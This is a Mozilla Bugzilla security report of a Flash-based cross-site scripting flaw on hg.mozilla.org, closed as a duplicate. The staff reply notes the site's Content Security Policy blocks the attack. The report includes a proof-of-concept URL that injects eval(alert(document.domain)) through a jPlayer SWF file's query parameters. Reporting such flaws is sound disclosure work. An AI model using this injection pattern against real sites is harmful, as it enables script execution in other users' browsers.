Closed
Bug 1420408
Opened 8 years ago
Closed 8 years ago
flash based xss on the site hg.mozilla.org
Categories
(Developer Services :: Mercurial: hg.mozilla.org, defect)
Developer Services
Mercurial: hg.mozilla.org
Tracking
(Not tracked)
RESOLVED
DUPLICATE
of bug 1341344
People
(Reporter: ignatio2007, Unassigned)
References
()
Details
(Keywords: reporter-external, Whiteboard: [reporter-external] [web-bounty-form] [verif?])
This xss for all versions of browsers Internet Explorer
how to reproduce:
1. to use a browser Internet Explorer
https://hg.mozilla.org/users/bsmedberg_mozilla.com/jPlayer-testcase/raw-file/969a31ffe2ec/Jplayer.swf?id=123'-eval(alert(document.domain))-'&jQuery=document.write
2. popup alert with name of domain in result.
p.s: to need enable flash player plugin in the browser
Flags: sec-bounty?
|
||
Comment 1•8 years ago
|
||
This XSS is blocked by the script-src directive of the CSP, in addition to requiring Flash. Older browsers that do not implement CSP would be vulnerable, but there's nothing we can really do about this, other than encourage people to use a modern browser.
Group: websites-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Component: Other → Mercurial: hg.mozilla.org
Product: Websites → Developer Services
Resolution: --- → WONTFIX
|
||
Updated•8 years ago
|
Resolution: WONTFIX → DUPLICATE
|
|
||
Updated•8 years ago
|
Flags: sec-bounty? → sec-bounty-
|
||
Updated•1 year ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•